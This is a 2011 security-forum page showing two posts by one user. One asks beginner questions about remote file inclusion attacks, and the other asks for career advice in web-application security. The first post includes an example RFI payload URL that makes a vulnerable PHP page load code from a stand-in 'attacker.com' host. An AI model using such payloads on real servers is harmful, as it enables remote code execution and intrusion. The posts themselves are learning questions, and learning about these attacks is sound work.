Darksat IT Security Forums
January 12, 2026, 01:28:29 am
Welcome, Guest. Please login or register.

Login with username, password and session length
News: Darksat IT Security Forum
From Firewall Support, AntiVirus Questions, Spyware problems, Linux and Windows Security, Black Hat SEO right down to Website Design and Multimedia
 
  Home Help Search Gallery Links Staff List Login Register  
  Show Posts
Pages: [1]
1  Hardware, Software and Security / IT Security Forum / Some questions on Remote file inclusion attacks? on: September 01, 2011, 10:41:57 pm
Hi guys,
i have been started to learn/read about RFI attacks and i have readed some books,documents and some tutorials regarding this.

At the i have been ended up with some questions,i tought it would be good to ask here

here are my questions:

1)does RFI attacks only works with the php language?
2)dont this attack work on other server side scripting languages such as jsp,asp and other server side scripting languages?
3)if yes why?
4)is this the one and only form of RFI injection?
Code:
http://www.target.com/vuln_page.php?file=http://attacker.com/malicious
5)Also what types of files can be injected in the space "malicious"
is this only limited to php and txt files ?
6)why this class of vulnerability is dying very fast ?,because when i checked in sites like 1337day and exploit-db for these kind of bugs
i had seen that last RFI has been posted before 3-4 months,so it seems this breed of bug is dying fast.

Looking for some answers..
2  Hardware, Software and Security / IT Security Forum / Need some guidance/advice for beginning my carrier in websec on: August 20, 2011, 10:05:54 pm
hi guys,
I am student in IT,

At first i am interested in professional networking and Network security related things like pen testing and ethical hacking,but at a stage i got bored on it,when i asked about the job opportunities related to the Network security based on certifications like CEH bla bla One of the security guy advised me that those kind of things like "network pen-testing " is dying,you still can do CEH and get a job,but to our standards it wont be a challenging thing to learn and also it don't have a bright feature as like web-application security "...


Also i am much more fascinated in learning things related to web-app security and i tought it would be challenging for me and also it seems this field has a bright feature while compared to Network-pen testing and ethical hacking..


even tough i am a IT student i studied coding related things just to pass the exams,I didn't studied knowledge-fully as during those stage i am much fascinated in Network and Network security related things,

But as now i am realizing that i had made a wrong choice,so i am willing to start my carrier in web-application security related side and also want to sharpen my knowledge on this field

now here are my questions which needs to be addressed

1)where should i build the basic knowledge about the web-applications and web-application security ?

2)As a beginner in this field what are all the languages i should learn in the starting stage? because i know there are many languages like html,php,asp,java script,vb script...

which one will be easy for a beginner like me?

3)Is there any course/CBT videos out there for understanding the basics of these web-application security ?can you guys suggest me any best videos for beginners like me?

4)tell me from your experience,depends on our interest level how long it would take to learn a few of these languages ? because i need to learn them quick ,so that i can try to get a in this field as soon as possible...


5)Is there any others suggestions/advice you got for me ?


hope my concerns will be addressed soon...
Pages: [1]
Powered by EzPortal
eXTReMe Tracker
Security Forum
Bookmark this site! | Upgrade This Forum
SMF For Free - Create your own Forum


Powered by SMF | SMF © 2016, Simple Machines
Privacy Policy
Page created in 0.023 seconds with 13 queries.